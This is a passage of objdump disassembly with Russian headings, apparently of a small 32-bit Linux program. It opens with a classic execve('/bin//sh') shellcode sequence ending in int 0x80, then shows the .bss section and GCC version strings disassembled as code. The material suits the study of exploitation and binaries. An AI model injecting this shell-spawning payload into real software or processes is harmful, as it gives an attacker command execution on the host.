 804a082:	31 c0                	xor    %eax,%eax
 804a084:	52                   	push   %edx
 804a085:	68 6e 2f 73 68       	push   $0x68732f6e
 804a08a:	68 2f 2f 62 69       	push   $0x69622f2f
 804a08f:	89 e3                	mov    %esp,%ebx
 804a091:	52                   	push   %edx
 804a092:	53                   	push   %ebx
 804a093:	89 e1                	mov    %esp,%ecx
 804a095:	52                   	push   %edx
 804a096:	89 e2                	mov    %esp,%edx
 804a098:	b0 0b                	mov    $0xb,%al
 804a09a:	cd 80                	int    $0x80
	...

Дизассемблирование раздела .bss:

0804a09d <__bss_start>:
 804a09d:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .comment:

00000000 <.comment>:
   0:	47                   	inc    %edi
   1:	43                   	inc    %ebx
   2:	43                   	inc    %ebx
   3:	3a 20                	cmp    (%eax),%ah
   5:	28 55 62             	sub    %dl,0x62(%ebp)
   8:	75 6e                	jne    78 <_init-0x804823c>
   a:	74 75                	je     81 <_init-0x8048233>
   c:	20 34 2e             	and    %dh,(%esi,%ebp,1)
   f:	38 2e                	cmp    %ch,(%esi)
  11:	34 2d                	xor    $0x2d,%al
  13:	32 75 62             	xor    0x62(%ebp),%dh
  16:	75 6e                	jne    86 <_init-0x804822e>
  18:	74 75                	je     8f <_init-0x8048225>
  1a:	31 7e 31             	xor    %edi,0x31(%esi)
  1d:	34 2e                	xor    $0x2e,%al
  1f:	30 34 29             	xor    %dh,(%ecx,%ebp,1)
  22:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  25:	38 2e                	cmp    %ch,(%esi)
  27:	34 00                	xor    $0x0,%al
  29:	47                   	inc    %edi
  2a:	43                   	inc    %ebx
  2b:	43                   	inc    %ebx
  2c:	3a 20                	cmp    (%eax),%ah
  2e:	28 55 62             	sub    %dl,0x62(%ebp)
  31:	75 6e                	jne    a1 <_init-0x8048213>
  33:	74 75                	je     aa <_init-0x804820a>
  35:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  38:	38 2e                	cmp    %ch,(%esi)
  3a:	32 2d 31 39 75 62    	xor    0x62753931,%ch
  40:	75 6e                	jne    b0 <_init-0x8048204>
  42:	74 75                	je     b9 <_init-0x80481fb>
  44:	31 29                	xor    %ebp,(%ecx)
  46:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  49:	38 2e                	cmp    %ch,(%esi)
  4b:	32 00                	xor    (%eax),%al
